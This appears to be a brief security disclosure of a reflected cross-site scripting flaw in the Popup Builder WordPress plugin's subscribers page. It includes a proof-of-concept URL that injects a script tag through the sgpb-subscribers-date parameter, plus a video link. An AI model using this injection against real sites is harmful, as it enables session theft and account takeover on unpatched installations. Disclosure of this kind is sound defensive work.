The βAll Subscribersβ setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.
http://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscribers-date=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E
Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg